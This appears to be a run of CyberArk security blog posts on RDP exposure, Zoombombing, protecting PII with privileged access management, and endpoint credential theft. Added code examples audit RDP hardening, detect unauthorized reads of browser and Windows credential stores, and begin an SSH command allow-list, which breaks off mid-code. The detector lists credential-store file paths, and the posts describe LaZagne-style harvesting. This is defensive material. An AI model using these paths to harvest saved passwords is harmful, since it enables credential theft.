From the onset of the Covid-19 outbreak until the end of March, Shodan (a global search engine that scans and indexes internet-connected devices) tracked a 41% spike in Remote Desktop Protocol (RDP) usage. This makes sense since RDP is a popular way for users to access Windows machines and servers remotely over their VPN connections.

Organizations have ramped up RDP use to enable their remote workforce and maintain business operations during this time of uncertainty. Yet, while RDP is more secure than remote connection tools that do not encrypt entire sessions, two critical RDP vulnerabilities disclosed in the past year – BlueKeep and DejaBlue – highlight potential security risks. (You can learn more about these in this Threat Research blog).

In a recent SANS Technology Institute podcast, Dean of Research Johannes B. Ullrich, Ph.D. reported a sharp increase in exposed RDP servers (between 20-30%) and connected this surge to the number of system administrators now working from home. These “power users” have privileged access and are now managing servers from remote locations.

Cyber attackers have taken advantage of sysadmins working remotely and are dedicating more resources to scanning for the standard RDP port 3389 to see what has been exposed. They’ve also launched a wave of brute-force attacks using automation tools to systematically test username and credential combinations until they crack the code.

In a story told time and time again, once attackers gain an administrator’s privileged credentials, they can move laterally through the environment, escalating privileges until they reach valuable targets like the domain controller or cloud console. This access allows them to control any server, controller, endpoint or piece of data anywhere on a network. They can run commands, disable antivirus software, install malware, encrypt data for ransom or steal valuable data, including PII.

Fortunately, there are a few steps organizations can take to improve RDP security and reduce the risk of a data breach:

  1. Limit Privileged Access. By default, all administrators can log into RDP. Implement the principle of least privilege by limiting administrative privileges to only those who absolutely need them. Even better, layer in and enable just-in-time provisioning for remote vendors who are not part of the directory service so that their access is time-limited. Be sure to monitor and track all user access and activity during privileged sessions, especially for Tier 0 assets like domain controllers or cloud consoles.
  2. Keep software up-to-date on all remote Windows machines connecting to the internet – including Windows 7 workstations.
  3. Enable NLA. Network level authentication (NLA) provides an extra level of authentication before a connection is established.
  4. Avoid Exposure. Keep RDP servers behind your firewall. Never allow direct RDP connections that expose machines and servers to the internet, which can put your critical data and internal systems at risk.
  5. Use Strong Passwords and Multifactor Authentication. Brute force tools are getting sophisticated. Strong password policies must be followed – and multi-factor authentication is a must. Even better, consider tools that eliminate passwords and other network-based access controls altogether.
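As an added example (not code from the CyberArk post), the PowerShell audit below checks a Windows host against the five steps above and counts failed RDP logons by source address, the signal the brute-force wave described earlier leaves in the Security log. It assumes an elevated session on an English-locale host (the firewall rule group name and `net accounts` output are language-dependent), and the thresholds marked "assumption" are illustrative choices of mine.

```powershell
# Added example, not code from the CyberArk post: audit one Windows host against the
# five RDP hardening steps and surface brute-force attempts against it.
# Run in an elevated Windows PowerShell 5.1+ session on an English-locale host.
# Thresholds marked "assumption" are illustrative, not values from the post.

$TsRoot   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RdpTcp   = Join-Path -Path $TsRoot -ChildPath 'WinStations\RDP-Tcp'
$Findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Status, [string]$Step, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Status = $Status; Step = $Step; Detail = $Detail })
}

# fDenyTSConnections = 1 means Remote Desktop is switched off; the checks below
# matter only while the host is accepting connections.
$RdpOn = (Get-ItemProperty -Path $TsRoot).fDenyTSConnections -eq 0
Add-Finding 'INFO' 'RDP listener' $(if ($RdpOn) { 'enabled' } else { 'disabled' })

# Step 1 - Limit privileged access. Every local administrator can use RDP by
# default, so they are listed together with the explicit Remote Desktop Users.
$Principals = @('Remote Desktop Users', 'Administrators' | ForEach-Object {
        Get-LocalGroupMember -Group $_ -ErrorAction SilentlyContinue
    } | Select-Object -ExpandProperty Name -Unique)
$MaxPrincipals = 5   # assumption: a short, named list of admins is the expected state
$Status = if ($Principals.Count -le $MaxPrincipals) { 'PASS' } else { 'FAIL' }
Add-Finding $Status 'Limit privileged access' ('RDP-capable principals: ' + ($Principals -join ', '))

# Step 2 - Keep software up to date: flag end-of-life Windows 7 and stale patching.
$Os = Get-CimInstance -ClassName Win32_OperatingSystem
$LastPatch = Get-HotFix | Where-Object InstalledOn | Sort-Object InstalledOn -Descending |
    Select-Object -First 1 -ExpandProperty InstalledOn
$Stale = (-not $LastPatch) -or ($LastPatch -lt (Get-Date).AddDays(-30))   # assumption: 30 days
$Status = if ($Os.Caption -match 'Windows 7' -or $Stale) { 'FAIL' } else { 'PASS' }
Add-Finding $Status 'Keep software up to date' ('{0}; last hotfix installed {1}' -f $Os.Caption, $LastPatch)

# Step 3 - Enable NLA. UserAuthentication=1 authenticates (CredSSP) before a session
# exists; SecurityLayer=2 forces TLS instead of the legacy RDP security layer.
$Rdp = Get-ItemProperty -Path $RdpTcp
$Status = if ($Rdp.UserAuthentication -eq 1 -and $Rdp.SecurityLayer -eq 2) { 'PASS' } else { 'FAIL' }
Add-Finding $Status 'Enable NLA' ('UserAuthentication={0} SecurityLayer={1}' -f $Rdp.UserAuthentication, $Rdp.SecurityLayer)

# Step 4 - Avoid exposure. An enabled inbound Remote Desktop rule that accepts any
# remote address on the Public profile is exactly what internet scanning for 3389 finds.
$Exposed = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound -Enabled True -ErrorAction SilentlyContinue |
    Where-Object { $_.Profile.ToString() -match 'Public|Any' } |
    Where-Object { ($_ | Get-NetFirewallAddressFilter).RemoteAddress -contains 'Any' } |
    Select-Object -ExpandProperty DisplayName)
$Status = if ($Exposed.Count -eq 0) { 'PASS' } else { 'FAIL' }
$Detail = 'Listening on port {0}; unrestricted public rules: {1}' -f $Rdp.PortNumber, $(if ($Exposed) { $Exposed -join ', ' } else { 'none' })
Add-Finding $Status 'Avoid exposure' $Detail

# Step 5 - Strong passwords and MFA. Local password policy comes from 'net accounts';
# MFA is enforced by the identity/PAM layer, so it is reported as a manual check.
$NetAccounts = net accounts
$MinLen  = [int]((($NetAccounts -match 'Minimum password length') | Select-Object -First 1) -replace '\D', '')
$Lockout = ((($NetAccounts -match 'Lockout threshold') | Select-Object -First 1) -replace '^.*:\s*', '').Trim()
$PwOk = ($MinLen -ge 14) -and ($Lockout -ne 'Never')   # assumption: 14 chars, any lockout threshold
$Status = if ($PwOk) { 'PASS' } else { 'FAIL' }
Add-Finding $Status 'Strong passwords and MFA' ('Min length {0}, lockout threshold {1}; confirm MFA at the PAM/identity layer' -f $MinLen, $Lockout)

# Detection: failed logons (event 4625) in the last 24 hours grouped by source address.
# With NLA on, failed RDP attempts are logged as logon type 3 (network) rather than
# 10 (RemoteInteractive), so both types are counted.
$Failed = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-24) } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $Data = ([xml]$_.ToXml()).Event.EventData.Data
        [pscustomobject]@{
            LogonType = ($Data | Where-Object Name -eq 'LogonType').'#text'
            Source    = ($Data | Where-Object Name -eq 'IpAddress').'#text'
            Account   = ($Data | Where-Object Name -eq 'TargetUserName').'#text'
        }
    } | Where-Object { $_.LogonType -in @('3', '10') }
$Suspects = $Failed | Group-Object Source | Where-Object Count -ge 20 | Sort-Object Count -Descending   # assumption: 20 failures
foreach ($s in $Suspects) {
    $Accounts = ($s.Group.Account | Select-Object -Unique) -join ', '
    Add-Finding 'ALERT' 'Brute-force indicator' ('{0} failed logons from {1} against: {2}' -f $s.Count, $s.Name, $Accounts)
}

$Findings | Format-Table -AutoSize
```

A FAIL on step 4 together with an ALERT row is the combination the post describes: an RDP listener reachable from the internet that is already being password-sprayed.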

Privileged Access Management (PAM) tools like the CyberArk Privileged Access Security Solution help organizations establish a secure RDP connection from the start. Privileged credentials are centrally stored and managed in a digital vault and access is granted according to user permissions. The web browser session is isolated and encrypted. Privileged user activity is tightly monitored and controlled, and suspicious activity is flagged so SOC teams can respond immediately.

Meanwhile, remote workers can use native workflows that don’t expose their endpoints to the credentials needed to access critical IT systems for work, maintenance or otherwise. Best of all, these strong PAM controls extend beyond RDP to help organizations secure remote connections to any web-facing system, like SSH authentication to Unix/Linux.

Interested in learning more? Register for our April 28 webinar Privileged Access 101: Changing Your Security Game or watch it on demand anytime.

]]>
Friction-Free Experience vs Secure Access: Lessons From the “Zoombombing” Fallout https://www.cyberark.com/blog/friction-free-experience-vs-secure-access-lessons-from-the-zoombombing-fallout/ Fri, 24 Apr 2020 18:05:55 +0000 https://www.cyberark.com/?p=99515

The controversy and fallout resulting from the widespread reporting of bad actors gaining access to Zoom meetings is just another example of the constant struggle faced by developers and designers of how to balance a friction-free experience and ensuring secure access and privacy.

In the last few weeks, everyone has become familiar with “Zoombombing” — when uninvited guests show up in your Zoom video meetings with the sole intention of disrupting them, whether the purpose of the meeting is business, education or a virtual gathering of friends. There have been reports of hackers shouting angry and violent comments, and some sharing lewd videos and images. With the world struggling to adapt to a new reality — which, for many, involves working from home for an extended period for the first time in their professional lives – the last thing anyone needs is additional headaches piled on by malicious individuals simply because they can.

The challenge stems from the fact that Zoom meetings have default settings geared toward user convenience and a frictionless experience — rather than security and privacy. Hackers are able to guess at Zoom URLs and gain access with minimal barriers in their way. There are security measures in place within Zoom, but they aren’t enabled by default and most users aren’t even aware they can do things such as setting a meeting password, click the box that doesn’t allow anyone to enter before the host, or an option that places all new guests in a virtual waiting room before they are approved by the host. Additionally, with Zoom going from a primarily office-based system to a global social outlet practically overnight, these outcomes were exacerbated.

Zoom CEO Eric Yuan immediately issued an apology and said the company was working fast to address the concerns. His choice of words in his response was particularly significant. While acknowledging that default security measures were overlooked, he also said Zoom’s “intentions are good.” It is worth noting that this isn’t the company’s first run-in with security problems — Zoom stirred up controversy with a macOS auto-installer that bypassed typical user interactions to make the install experience more seamless than most other software. These choices and this “Zoombombing” situation highlight an issue that is a much bigger industry challenge, and has been for a long time.

UX vs. Security

Steve Jobs made Apple into the most valuable company in the world with the ability to surprise and delight customers. The goal of productivity applications like Zoom is to surprise and delight users with an unexpectedly seamless and easy end-user experience. Users flock to a convenient and frictionless user experience which in turn often leads to mass adoption. In the race to make things seamless for people, there is a constant tension between limiting “friction” — how many steps it takes to gain access to an application — and enforcing security. It is interesting to note that Zoom was founded by Yuan and other former WebEx engineers with the express intention of creating a more user-friendly video conferencing experience. It wasn’t that they weren’t aware of the potential security issues, it was that they made a conscious choice to weigh things more heavily on the side of a great UX.

So when Yuan says their “intentions are good” he’s right. Zoom had good intentions to improve the user experience, but the results were going to be inevitably unbalanced. It wasn’t that they were caught unaware during the “Zoombombing” phenomenon, it was just that the practice exploited the seams where Zoom opted for convenience and accessibility over stringent security and at a time when the platform was experiencing a surge in use among individuals rather than businesses. They are far from alone in this – in fact, it’s a constant struggle for most interface design. Driving innovation sometimes means sacrificing either the user experience or security. Neither is a preferred choice, but it’s a choice that must be made.

Striking the Right Balance

Fortunately, trying to find some balance between frictionless access and security is exactly what we at Idaptive do in our quest to provide organizations with Identity and Access Management solutions. As our CEO Danny Kibel writes, there are “two extremes” when it comes to security. “On one end, you can unplug everything from the internet, while constantly requiring physical and digital verification. That’s maximum security, but it’s also maximum inconvenience. On the other side, you can create a totally frictionless user experience, but leave your employees and systems completely exposed to malicious actors.” Zoom — and others – felt strongly that they should bet on the intended users first, and hope that the malicious actors would be minimal.

We see concepts like biometrics, behavioral, and other contextual data as being key to finding some sort of balance. We envision a “Zero Trust,” password-less future where applications are able to consider a multitude of factors to recognize authorized users and identify risk — not with simple passwords, but with device usage tendencies, location, past behavior, and even typing particularities. The applications “know” you and can understand what is abnormal or suspicious without having to add newer and more stringent gates between the user and the application.

While the headlines were quick to paint Zoom as being caught with their proverbial pants down over “Zoombombing,” the truth is that the company set out with a clear and positive objective — and succeeded enormously — but had to make tough choices along the way. Not even five years ago, users (especially in the US) greatly valued convenience over privacy/security. But since the last US presidential election, the winds have dramatically shifted (likely sparked by the Cambridge Analytica/Facebook scandal and Russian election interference). Zoom didn’t shift with the times and what was their greatest strength — ease of use — has become their unexpected Achilles heel.

No one anticipated a global pandemic forcing hundreds of millions to suddenly have to figure out how to work or run classrooms from home. Unfortunately, times of chaos sometimes open doors for the opportunistic. What we have here is a lesson for all developers moving forward. We need to bridge the gap between user experience and security. Perhaps being forced into it by unforeseen and extenuating circumstances will give us the impetus for giant leaps forward. Now if you will excuse me, I am late for my Zoom meeting…

]]>
How Privileged Access Management Can Protect PII https://www.cyberark.com/blog/how-privileged-access-management-can-protect-pii/ Fri, 24 Apr 2020 13:26:30 +0000 https://www.cyberark.com/?p=89730 Personally Identifiable Information

The data protection lessons learned over the last 10 years have underscored the importance of protecting personally identifiable information (PII) time and time again. Nearly 4 billion records have been lost across the 15 largest data breaches in history — 10 of which occurred in the last decade. When these breaches happen, businesses face more than just a hit to their brand reputation – they can also translate to fines and penalties equaling millions or even billions of dollars.

Because the security of PII continues to grow in complexity, governments are continuously extending the rights of individuals to better control and protect the use of their personal data. In the European Union, enforcement of the General Data Protection Regulation (GDPR) began in May 2018 to regulate data protection and privacy.

Meanwhile, in the United States, a bill meant to impose penalties for cybersecurity breaches that put sensitive consumer data at risk, the Data Breach Prevention and Compensation Act, is winding its way through Congress, and several states already have their own data security breach laws similar to GDPR.

The recent New York law, Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), which was implemented to broaden data security and breach notification requirements, expanded the definition of the types of private information to be protected. For example, SHIELD added data elements or a combination of data elements that would grant access to someone’s PII to the types of protected information.

Furthermore, email addresses, email passwords and biometric information (digital copies of fingerprints, voice prints, retina scans or any other digital representation of biometric data) fall under the expanded definition of the types of private information under the SHIELD Act.

As more privacy laws continue to be enacted throughout the world, it is clear that companies now have a legal obligation to protect consumer data, and with fines up to as much as 4% of annual global revenue (in the case of GDPR), it is an obligation that no company can afford to ignore. The National Institute for Standards and Technology (NIST) suggests that PII should be protected through a combination of measures including operational safeguards, privacy-specific safeguards and security controls aligned to a risk-based approach.

Privileged access management has a key role to play in protecting PII. Here’s how:

Access Enforcement and Separation of Duties

Organizations should control access to PII through policies and access enforcement mechanisms. One of the ways this can be done is by managing privileged credential policies across the entire IT environment, isolating sessions through a highly secured proxy and implementing role-based access control to help ensure that each user can only access the systems and data needed for their specific role.

Privileged access management solutions continuously scan the environment to detect privileged access, validate privilege by adding discovered accounts to a pending queue and automatically onboard and rotate accounts and credentials based on enterprise policy in a highly encrypted vault.

The use of a secure and fully-isolated proxy helps prevent the exposure of privileged credentials directly to the end users, their target applications or devices. This secure control point manages access to these privileged credentials and implements dual-control for a more robust workflow, providing users with customized approval workflows that ensure that they are in compliance and allowed to access the systems hosting PII – no matter the environment (cloud or hybrid).

User-Based Collaboration and Information Sharing

Another NIST guideline focuses on the need for automated mechanisms to assist users in determining whether access authorizations match access restrictions. This is especially important for PII. Privileged access management solutions can integrate with IT service management solutions to enforce security policies in an operationally efficient manner. They do this by triggering the approval processes that authorize access to systems and applications containing PII and elevate privileges to execute tasks within a system or application.

Remote Access

In order to perform their defined tasks, organizations often grant third party companies access to critical internal systems and sensitive information, including PII. Providing remote access through VPNs is a common and valuable solution for a secure connection from outside the network. However, when it comes to providing access to critical business systems and applications, such as ones that manage and store PII, VPNs aren’t designed to provide granular, role-based access.

Remote access solutions aim to solve this problem by leveraging Zero Trust access, biometric multi-factor authentication and just-in-time provisioning so that third parties only have access to the systems they need, and for only as long as they need it.

Least Privilege

It’s a common best practice to only allow access to applications and machines by those who are performing a specified task. Privileged access management solutions help enforce defined access permissions. These solutions are also integral to enforcing the principle of least privilege – that people only have access to what they need to do their jobs and only for a certain amount of time.

Privileged access management solutions remove and manage local admin rights on workstations and servers, approve applications to run and block malware, including ransomware. Unknown applications are able to run in ‘restricted mode,’ which prevents them from accessing corporate resources, sensitive data such as PII or the Internet.

Auditable Events, Reviews, Analysis and Reporting

In order for businesses to comply with multiple regulations, they need to demonstrate for audits that they are correctly managing PII. Privileged access management solutions enable companies to automatically record and store privileged sessions within a centralized encrypted repository. Auditors can prioritize recorded and active sessions, with video playback that streamlines review of the most suspicious activity.

Identification and Authentication

A crucial step in a strong security program is the ability to identify and authenticate users before accessing critical systems and sensitive PII. Privileged access management solutions help authenticate users and transparently log onto applications using credentials stored and managed in highly encrypted vaults.

These solutions can also integrate with and support user accounts and groups whose details are stored externally in LDAP-compliant directories, and use Active Directory Federation Services (ADFS) to access environments with single sign-on. Equally, leveraging multifactor authentication (MFA) as part of an overall privileged access management program allows organizations to add an extra layer of protection – beyond a password – to better secure systems containing sensitive information.

As organizations continue to grapple with new and emerging regulations, a mature privileged access management program can play a key role in helping to not only protect sensitive PII and comply with these directives, but also to continue to build consumer trust.

Attackers have been very successful (and profitable) over the last 10 years – putting many companies and their security programs to the ultimate test. As we start this new decade, it’s unlikely that attackers will slow down, but there are tools and technologies to help limit their success.

Want to learn more? Find out how Privileged access management helps meet NIST controls for access management, audit and accountability, and identification and authentication. Or check out the CyberArk Blueprint for simple and prescriptive guidance on how to develop effective and mature privileged access management programs.

]]>
Office Exodus Drives Endpoint (In)Security https://www.cyberark.com/blog/office-exodus-drives-endpoint-insecurity/ Wed, 22 Apr 2020 13:00:32 +0000 https://www.cyberark.com/?p=89535

Around the globe, the rapid, unplanned shift to remote work has tested CISOs’ ability to get employees up and running quickly and demonstrate decisive leadership in the face of uncertainty.

To support workforce productivity and reduce the strain on IT support teams (who are bombarded with calls from employees unaccustomed to remote work), many organizations choose convenience over security out of a perceived necessity.

This is perhaps most evident in the initial lax approach to endpoint security. For example, BYOD use has skyrocketed – regardless of company policy. Further, in many cases, IT and security teams are granting full local admin rights to employee devices, enabling workers to use various programs, download applications and software, connect and install devices and access corporate systems and information with ease.

While local admin rights promote self-sufficiency, they can also introduce serious risk. Employees trying to navigate their day-to-day tasks from home are downloading unsanctioned applications and unlicensed software en masse without security oversight.

And, as remote users tend to use the same device for work and personal use, they could easily (and unknowingly) execute malicious software as they browse online news sites, launch apps for virtual school sessions or download games to pass the time.

Even worse, with powerful local admin rights at their disposal, cyber attackers or remote employees with malicious intent can do anything from modifying system configurations to changing powerful administrative accounts.

Remote Workers’ Endpoint Devices Are Under Attack. Privileged Credentials Are the Target.

Even without local admin rights, employee devices are a prime target. Attackers know that, out of convenience, people often save passwords in their devices’ credential stores (e.g., Chrome, Firefox and Chromium), chat applications (e.g., Pidgin and Skype), email (e.g., Outlook and Gmail) and even system admin tools (e.g., FileZilla, OpenSSH, VNC and WinSCP).

Using credential harvesting malware like LaZagne, attackers can retrieve passwords for personal web accounts and sensitive company assets alike. After harvesting “low-hanging” passwords quickly and with minimal effort, attackers then work to find privileged credentials and escalate access rights. Once the device is compromised, they can leverage the company’s VPN connection to move laterally, continue to escalate privileges, extend to other parts of the corporate network, and gain access to critical assets and information.

Here’s a look at how easily this can happen:

Employee “John” started working from home in March following a shelter in place order. He was given local admin rights on his laptop that allow him to do things like link his home printer to his device without help desk assistance. This also gives him the freedom to conduct personal online activities without connecting to the VPN.

  1. John logs into his personal email account and opens a message from his bank with his monthly statement. As usual, he clicks “View Statement” and downloads the PDF file.
  2. He tries to open the PDF and is prompted to enter a password. Assuming his bank has amped up security measures during this time of uncertainty, he types in his banking password then clicks on the link to open his statement.
  3. After clicking the link, John is either directed to a corrupted attachment or an invalid web link. As part of this “drive-by download” attack, John has unintentionally downloaded LaZagne. The malware runs behind the scenes to harvest credentials saved in John’s web browser and applications (including credentials to corporate applications and systems). The malware sends these credentials out to the remote attacker or Command and Control server. Here’s what this looks like via a Windows command prompt. But, remember, John has no idea that this just happened.

Pervasive local admin rights, distracted or unaware remote employees and unprotected credentials have created the perfect storm for endpoint attacks. In recent weeks, researchers have recorded a spike in threats tied to the current global situation—from “CoronaVirus” ransomware distributed alongside the “KPot” infostealer, to “Emotet” malware disguised as infection-prevention tip emails, to an APT group spreading a custom remote access trojan (RAT) that takes screenshots of the device, develops a list of files and directories and downloads files – and more.

Enforcing Least Privilege, Credential Theft Protection and App Control Across Remote Workstations

We’re entering the next phase of what many believe will be a permanent shift in the way people work – a new normal. Enhanced situational awareness will quickly advance to risk mitigation within a matter of weeks. Critical steps in this “action” phase will be removing local admin rights and enforcing the principle of least privilege (PoLP) – that a user should only have the minimum level of access they need to do their job – to contain malware, ransomware and other threats on the endpoint.

This is why solutions like CyberArk Endpoint Privilege Manager are so crucial to an overall privileged access management (PAM) strategy. Organizations must strike the right balance between security, end user and help desk productivity. By adding a critical protection layer to strengthen existing endpoint security tools like DLP and antivirus/NGAV, CyberArk enables companies to block and contain attacks early in their lifecycle and help prevent data breaches.

Let’s take a look at the above drive-by download attack example again – but this time with CyberArk Endpoint Privilege Manager deployed.

  1. With CyberArk, John must log in to his device as a standard business user – without local admin rights. He then follows steps 1 and 2 above. CyberArk’s credential theft protection capability blocks unauthorized applications and processes from accessing the device’s software credential stores, so the LaZagne malware cannot harvest any credentials. And because John is a standard user, even if his credential does fall into the wrong hands, it will be virtually useless for gaining access into the enterprise.

  2. When John tries to download an unknown application – for work or for personal use – on his device, CyberArk allows the application to run in a secure ‘restricted mode,’ preventing it from accessing corporate resources, sensitive data or the internet. CyberArk EPM can quickly calculate the application’s risk level and, if it is categorized as “malicious,” a policy can be created to block it from running.
  3. During John’s remote work stint, security teams can easily enforce least privilege. There are two ways to achieve this. One method is to use the CyberArk Endpoint Privilege Manager privilege elevation functionality to elevate authorized activities and applications based on policies; this covers roughly 80% of users’ day-to-day requirements. Endpoint Privilege Manager also offers an ad hoc mechanism that provides more flexibility with just-in-time access and elevation. By adding users to a “privilege group” for a limited time, security can keep an audit trail on the endpoint throughout the temporary period and revoke and terminate access at the end – or earlier if necessary. This is particularly useful today as organizations redeploy workers to focus on evolving business priorities and need a way to automatically provision and de-provision privileged credentials as responsibilities shift.
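A detection-side illustration of the credential theft protection described in step 1 above, added here as an example rather than CyberArk’s own code: it takes constructed file-access events (process image plus target path, as an EDR or Sysmon-style sensor would report them) and flags any process that reads a browser or Windows credential store without being that store’s owner. The store paths and the allow list of reader images are assumptions for the example, and a product such as EPM enforces this at access time rather than scanning events afterwards.

```python
"""Flag credential-store reads by processes that do not own the store.

Added illustration only; it is not CyberArk Endpoint Privilege Manager code and
does not enforce anything. It evaluates constructed file-access events (process
image + target path) against an allow list, the same policy shape a credential
theft protection control applies at access time.
"""
from fnmatch import fnmatchcase

# Where saved credentials live on a Windows workstation (assumed, illustrative
# subset). Patterns are lower-case; paths are lower-cased before matching.
CREDENTIAL_STORE_PATTERNS = [
    r"*\appdata\local\google\chrome\user data\*\login data",
    r"*\appdata\local\google\chrome\user data\local state",
    r"*\appdata\roaming\mozilla\firefox\profiles\*\logins.json",
    r"*\appdata\roaming\mozilla\firefox\profiles\*\key4.db",
    r"*\appdata\local\microsoft\credentials\*",
]

# Only these images may read the stores under the given paths. Anything else
# touching a credential store is unauthorized, including a browser reading
# another browser's store (assumed allow list).
ALLOWED_READERS = {
    "chrome.exe": [r"*\google\chrome\user data\*"],
    "firefox.exe": [r"*\mozilla\firefox\profiles\*"],
    "lsass.exe": [r"*\microsoft\credentials\*"],
}

# Constructed sample telemetry, not real sensor output. pid 5608 is the
# drive-by download from the scenario, reading three stores in a row.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5608, "image": r"C:\Users\john\Downloads\invoice_viewer.exe",
     "target": r"C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5608, "image": r"C:\Users\john\Downloads\invoice_viewer.exe",
     "target": r"C:\Users\john\AppData\Local\Google\Chrome\User Data\Local State"},
    {"pid": 5608, "image": r"C:\Users\john\Downloads\invoice_viewer.exe",
     "target": r"C:\Users\john\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\logins.json"},
    {"pid": 3300, "image": r"C:\Windows\System32\notepad.exe",
     "target": r"C:\Users\john\Documents\notes.txt"},
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\john\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\key4.db"},
]


def _matches_any(path, patterns):
    return any(fnmatchcase(path, pat) for pat in patterns)


def is_credential_store(path):
    """True when the path is one of the known saved-credential files."""
    return _matches_any(path.lower(), CREDENTIAL_STORE_PATTERNS)


def reader_is_allowed(image, path):
    """True only if this image name is allowed for the store at this path."""
    name = image.lower().rsplit("\\", 1)[-1]
    return _matches_any(path.lower(), ALLOWED_READERS.get(name, []))


def evaluate(event):
    """Return an alert dict for an unauthorized credential-store read, else None."""
    target = event["target"]
    if not is_credential_store(target):
        return None
    if reader_is_allowed(event["image"], target):
        return None
    return {"pid": event["pid"], "image": event["image"], "target": target,
            "reason": "process not authorized to read this credential store"}


def scan(events):
    """Run the policy over a batch of events and keep only the alerts."""
    return [alert for alert in map(evaluate, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} image={alert['image']} target={alert['target']}")
```

Note the last sample event: a browser reading another browser’s store is still flagged, because the allow list scopes each image to its own store rather than marking the image trusted everywhere. LaZagne-style tools read exactly these files, so watching the files complements, but does not replace, signature-based detection of the tool itself.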

Forward-looking CISOs are mapping out their phased approach to risk reduction – not only for the coming crucial weeks, but also the months and years ahead. As we settle into this new normal, employee devices will play an even greater role in conducting business – and introducing new security challenges. In fact, the distributed patchwork of desktop computers, laptops, smartphones and tablets has become our lifeline to the outside world. Now, more than ever, it’s imperative to protect these devices and the access they provide.

Want to learn more about CyberArk Endpoint Privilege Manager? Get started with a free trial. Want to learn more about securing workstations and remote access? Visit CyberArk’s risk distancing resource page.

Secure Workflows with Native Privileged Session Management https://www.cyberark.com/blog/enabling-secure-workforce-productivity-with-native-privileged-session-management/ Thu, 16 Apr 2020 15:41:50 +0000 https://www.cyberark.com/?p=89302

From user-friendly web apps like Salesforce to IT-centered functions such as Windows Remote Desktop Protocol (RDP), today’s workplace tools can be extremely powerful. While a mix of both modern and traditional tools and technologies can help boost employee productivity and operational efficiency, they also introduce a host of new challenges for security and compliance teams in the form of expanded privileged access.

Privilege Is Everywhere

A privileged user is any user who has the capability to change or impact the operational service of a business process. This includes not only system administrators, but also users you may not intuitively consider “privileged.” Privileged access extends to applications, machines and service accounts connecting to other systems, as well as software robots as part of robotic process automation (RPA) workflows.

As enterprises shift more workloads to the cloud, double down on digital transformation initiatives and increasingly automate processes, the number of privileged users and accounts grows and the potential attack surface continues to expand. Each step forward creates new “doors” that must be locked.

Yet, too often, locking many of these “doors” is overlooked by organizations as they forge ahead, often focused on driving business agility. RPA and application credentials are often highly privileged, giving broad access to sensitive data and systems. When these credentials are not properly secured, they can open up the enterprise to unnecessary risk. Unfortunately, attackers understand this, and increasingly target these unprotected entranceways—seeking out powerful, unsecured credentials to accomplish their goals.

So how can you continue to innovate and evolve in this digital landscape—and do it securely? And how do you lock all of these “doors” to stay secure, without slowing down productivity? For many organizations, this can seem like an insurmountable challenge. That’s where native privileged session management comes in.

Benefits of Native Privileged Session Management

When you secure privileged accounts on both the user and system access levels, you limit the ability for an external attacker or malicious insider to use compromised credentials to bypass monitoring solutions and security controls. To do this effectively across on-premises, hybrid and cloud environments, you must identify the right tools that can not only mitigate risk, but also allow employees to keep using the tools they want—and need—to do their jobs.

Privileged session management is a foundational component of any privileged access management (PAM) program—giving organizations the ability to:

  • Prevent cyberattacks by isolating end users from sensitive target machines.
  • Create accountability and control over privileged session access with policies, workflows and privileged single sign-on capabilities.
  • Deliver continuous monitoring and compliance with session recording without leaving a footprint on target machines.

With its advanced privileged session management capabilities, the CyberArk Privileged Access Security Solution provides end users the freedom to work with their favorite native tools and workflows, while simultaneously preventing credential exposure, isolating critical assets, automatically recording sessions and sorting sessions by risk to improve auditor productivity. We recently demonstrated a series of native deployment options, which include:

  • Access to all systems and apps from the CyberArk web interface
  • Native access for SSH and Windows admins
  • Native access for cloud admins and privileged business users

Following are highlights from the demonstration. To explore additional use cases, check out our on-demand webinar: Enable Secure Productivity with Native Session Management.

Workflow 1: CyberArk Privileged Session Manager for Windows

We provide several options for establishing secure session connections for Windows: RDP Files, ActiveX, HTML5 Gateway and native access with the RDP Proxy. Based on user experience preferences, security considerations and industry regulations, organizations can choose which option works best for their environment.

Here’s a brief look at how to establish secure sessions via RDP.

Figure 1: CyberArk Privileged Session Manager for Windows 


Workflow 2: CyberArk Privileged Session Manager for SSH

CyberArk Privileged Session Manager for SSH enables organizations to secure, control, monitor and audit privileged access to network devices and other SSH-based targets. It integrates with Microsoft Active Directory (AD) to provision users transparently on UNIX and Linux systems, streamline user management and reduce administrative overhead—without interrupting user workflow.

Privileged Session Manager for SSH can also restrict unauthorized commands executed by a privileged user on a network device or any SSH-based target system.

Similar to traditional Privileged Session Manager, this solution separates end users from target machines and initiates privileged sessions without divulging passwords or keys. Privileged Session Manager for SSH can also display a broad overview of all activity performed on every privileged account. All activities are fully monitored to help support strict auditing standards. Finally, the solution enables organizations to identify high-risk privileged sessions in real time, automatically suspend or terminate these sessions and initiate automatic credential rotation.
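The command restriction described above can be illustrated with a mechanism OpenSSH already provides: ForceCommand. The following is an added example, not CyberArk Privileged Session Manager code. It assumes the filter is installed as a ForceCommand on a jump host in front of Linux targets, that the user’s role is passed as the script’s first argument from an sshd Match block, and that the role-to-command allow lists are illustrative.

```python
#!/usr/bin/env python3
"""Allow-list filter for commands arriving over SSH, run as an OpenSSH ForceCommand.

Added illustration, not CyberArk Privileged Session Manager for SSH. sshd puts the
command the client asked for in SSH_ORIGINAL_COMMAND; the wrapper decides, writes
an audit record and only then executes. Roles and allowed patterns are assumed.
"""
import json
import os
import re
import shlex
import sys
import time
from dataclasses import dataclass

# Per-role allow list: regexes matched against the whole normalized command.
POLICY = {
    "ops-readonly": [
        r"systemctl status \S+",
        r"journalctl( -[a-z] \S+)*",
        r"cat /var/log/\S+",
        r"df( -h)?",
        r"uptime",
    ],
    "ops-admin": [
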